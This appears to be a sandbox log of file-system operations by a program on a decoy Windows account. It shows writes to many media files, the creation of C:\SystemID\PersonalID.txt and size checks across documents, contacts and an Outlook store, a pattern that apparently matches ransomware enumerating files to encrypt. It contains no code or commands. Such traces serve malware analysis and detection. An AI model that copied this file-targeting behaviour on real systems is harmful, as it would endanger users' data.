Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\7fX2K\jx1kJWZdi iCE.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\7fX2K\Si93eS7jq6X4SJC7vm61.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\_IS6dQkXRiXDfJ5-\ISL0.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\_IS6dQkXRiXDfJ5-\OIIPvpIKePb.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\X_INggXuIaYsOTYsJW7\4KoQgGe.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\X_INggXuIaYsOTYsJW7\MGGz-2Q618NkS r.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\8gCaS.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\4t8dP5RHOtB8TtLqW.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\b3vNAE2PVhFDju_7yS.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\d_Y88L0xD5.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\nOS9oi.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\sd3L87.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\UdyiuRr9KYVW-Px_.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\UyfgKSYNRi6Oyp.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\9tDINHGgROIz00XY.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\gpNfbjz4.avi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\qTnRlL.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\tMaPYPi5JgUXP1XW.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\U3-na4Ecc7B.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\w8QtRE0Av57MWN-aHv.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\y3s8jy4WEuwL8.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create Directory	C:\SystemID	-	1	Fn
Get Info	C:\SystemID\PersonalID.txt	type = file_type	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	type = size, size_out = 1178	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	type = size, size_out = 68382	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	type = size, size_out = 1171	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	type = size, size_out = 1177	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	type = size, size_out = 1174	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	type = size, size_out = 1172	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0N28733.jpg	type = size, size_out = 23764	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2_-YQaqX40ls7kZnQI.png	type = size, size_out = 42883	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4hZE9nFAdJv.png	type = size, size_out = 72383	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6bvJUbgBGTbsIJMKW8.jpg	type = size, size_out = 90807	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6igNpwR0pgLT9a.m4a	type = size, size_out = 81913	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\75tKv_wPWu nle.flv	type = size, size_out = 73082	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ay_t-P.bmp	type = size, size_out = 54412	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\C6eN8spyaXs9O5N.wav	type = size, size_out = 76811	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iMKYkmcr3Dm3Fk6ffK.ots	type = size, size_out = 46208	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kP8ULRqZpLx.m4a	type = size, size_out = 84557	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OXbBkJHSc.ods	type = size, size_out = 87707	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\p41R3hPr.swf	type = size, size_out = 20700	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pAeUc4J9behwUSLh5ZK.ppt	type = size, size_out = 69005	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PolmUMHRORMWgP.swf	type = size, size_out = 49751	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\QATxQ8 VuKhKsG6j5boU.m4a	type = size, size_out = 15761	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qTEbn_aHVk98J.pdf	type = size, size_out = 41342	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\q_qr72fTT.mkv	type = size, size_out = 55183	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rzNuUzflSMr4Y.wav	type = size, size_out = 37178	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t1oDIACQ6VZc-ArQIwpX.bmp	type = size, size_out = 64401	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Yg5sCFMNs8oiIw.swf	type = size, size_out = 95330	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	type = size, size_out = 578048	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0Q3LulVoi6BYXkATC.docx	type = size, size_out = 34360	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0r-zyx2wH0-I.pptx	type = size, size_out = 89443	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\30Wm1uP_k08jvj97lQ5Z.pptx	type = size, size_out = 81203	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7okz4Pc-gSuOVu.docx	type = size, size_out = 62368	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GfPtWvk5Lmj.xlsx	type = size, size_out = 37103	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GRA80ibP5ZcjgL2YpVJ.docx	type = size, size_out = 95277	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kpj8t.pptx	type = size, size_out = 86380	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\KsTqGqqzg.xlsx	type = size, size_out = 93014	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OrLlCAU81JJA3-CN.docx	type = size, size_out = 63625	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Q4Mi.xlsx	type = size, size_out = 7797	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\RAIpVw9N67HN.pptx	type = size, size_out = 23302	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rUyI.pptx	type = size, size_out = 99324	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\TFi_rpFOJSO_vICGfl.docx	type = size, size_out = 52942	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tGcOKsKW8vY3r.pptx	type = size, size_out = 54901	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tgGDARb0KAuLH86cV.pdf	type = size, size_out = 58406	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\UxVjqI79MHDnp-w7vHYP.xlsx	type = size, size_out = 20184	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ys koK.xlsx	type = size, size_out = 49948	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\f1KLA.m4a	type = size, size_out = 68428	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NDR1.m4a	type = size, size_out = 27145	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RCBYlf_e4F0CAnTDs_Cv.wav	type = size, size_out = 20588	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\U3NMPiDKOwkRxmiQp.m4a	type = size, size_out = 74569	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dQ_0l6.gif	type = size, size_out = 75972	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\2U_8PhFaccxBmEGBGe3v.flv	type = size, size_out = 42312	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\5Qd_U17.swf	type = size, size_out = 18584	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\7xg3.mkv	type = size, size_out = 66813	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\gJEx.avi	type = size, size_out = 78647	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\igFrRTPuZ1KOcff.avi	type = size, size_out = 36436	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M2Hq1q.mp4	type = size, size_out = 93366	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\thMFQm.flv	type = size, size_out = 40522	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vLbfj.mp4	type = size, size_out = 71155	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\VvaG-iQ-9rXlD9Y.mkv	type = size, size_out = 20251	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\LL-t.wav	type = size, size_out = 62233	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\PbT_4bgt7AZeNnG57IPC.avi	type = size, size_out = 55115	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\rb8St5qJhaFz.bmp	type = size, size_out = 96125	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\3yYw8jcr.png	type = size, size_out = 60172	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\45N3LRg1kFlD_Qyjf8.jpg	type = size, size_out = 98993	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\HID JrRHaaXMym.swf	type = size, size_out = 73996	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\XWPPBA.flv	type = size, size_out = 29499	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\FRhJVbO27hszhEC4EU.odp	type = size, size_out = 76025	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\pCC1nCcN4mL.xls	type = size, size_out = 81573	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\SNg4GRtr2YJUAzJ_6.ppt	type = size, size_out = 90315	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss	type = size, size_out = 0	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	type = size, size_out = 271360	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	type = size, size_out = 236	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	type = size, size_out = 226	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft Store.url	type = size, size_out = 134	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Autos.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Entertainment.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Sports.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Mail.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url	type = size, size_out = 133	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\LJP4K.m4a	type = size, size_out = 6135	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\-Bnbr4EKB.m4a	type = size, size_out = 8357	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\DD0VSBvifKy.wav	type = size, size_out = 66842	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\mt-NxS9.m4a	type = size, size_out = 88220	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\_US29v3kaQayesknOB.wav	type = size, size_out = 32849	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\71f4 4SP91MVI3\pakuYqh.png	type = size, size_out = 97006	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\9I3wBfC.png	type = size, size_out = 99015	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\gXqHnWD.bmp	type = size, size_out = 18228	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\pWM7.png	type = size, size_out = 53802	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3J2ydx.jpg	type = size, size_out = 60569	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\3uz9sjygz2I9u-5T7p.png	type = size, size_out = 81910	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\dbSz.png	type = size, size_out = 25297	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\XHt9VP7ib.gif	type = size, size_out = 29199	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\OSKgyoas7znhFe\_iolZcQAgtC1ACM.png	type = size, size_out = 56388	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\ampfWs0z5kbstxRZUv.png	type = size, size_out = 80449	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\HAJ2zHK0.png	type = size, size_out = 77604	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\lJDyJz4X_LOUsSG.png	type = size, size_out = 85823	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\Xu0FJPBCEsMrFdRg0wfb.png	type = size, size_out = 59276	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\r-u9vnXsx8Ur0\y0VZOX.jpg	type = size, size_out = 15611	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\1XL3nUBpXBByeYM.avi	type = size, size_out = 16829	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\bps8RA.avi	type = size, size_out = 1228	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\cpBN4K954GbZNf.mp4	type = size, size_out = 22741	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\GpZ VRAn1yi_-.swf	type = size, size_out = 26550	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\IiTufgt.mp4	type = size, size_out = 84769	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\jXsioQ.swf	type = size, size_out = 7069	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\LV_qcOmmob.mkv	type = size, size_out = 39504	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\mR73VRvHqMlHdz.mp4	type = size, size_out = 58638	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\s-v3cZbpeiJD1yTvhr.swf	type = size, size_out = 8178	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\UAJvNRac055.avi	type = size, size_out = 64581	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\x6E1GbuOZBC_86.swf	type = size, size_out = 21131	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\Zmx9tyz7RoVpEsv00H.flv	type = size, size_out = 68118	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\6ften7Ta9q8fR_DlLE.mp4	type = size, size_out = 27742	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\8ndf-ek48BAm.jpg	type = size, size_out = 53178	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\PkQ0fGsu5.csv	type = size, size_out = 30798	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\SGPp8BH7eiOdE.mp3	type = size, size_out = 36999	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\u5VpH1Gfjec38H3.jpg	type = size, size_out = 29680	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\TB1FXyT70\wCHfAt0k5.wav	type = size, size_out = 84248	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\-pPGVSgI.ppt	type = size, size_out = 81061	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\Dk-mCKfeMJ.xls	type = size, size_out = 72181	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\f7Iu.ppt	type = size, size_out = 21978	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\hv8Rvu6GKv.ppt	type = size, size_out = 73949	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\VoZWZdD.xls	type = size, size_out = 37797	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\JfBL0k2cocNOiKXL4y9\_-u6ogOGtJDh_andzkIr.odt	type = size, size_out = 101036	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0X9H7M.ppt	type = size, size_out = 47677	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\8RDB7k.doc	type = size, size_out = 21922	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\e6btBcfWeC9TI4.pps	type = size, size_out = 57524	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\FtBJIQkicPBzsMWmM5J.rtf	type = size, size_out = 48748	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\j3Zk5qyJiGa6pOh.odp	type = size, size_out = 4701	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\0jha7Ez6BS.ods	type = size, size_out = 32456	1	Fn
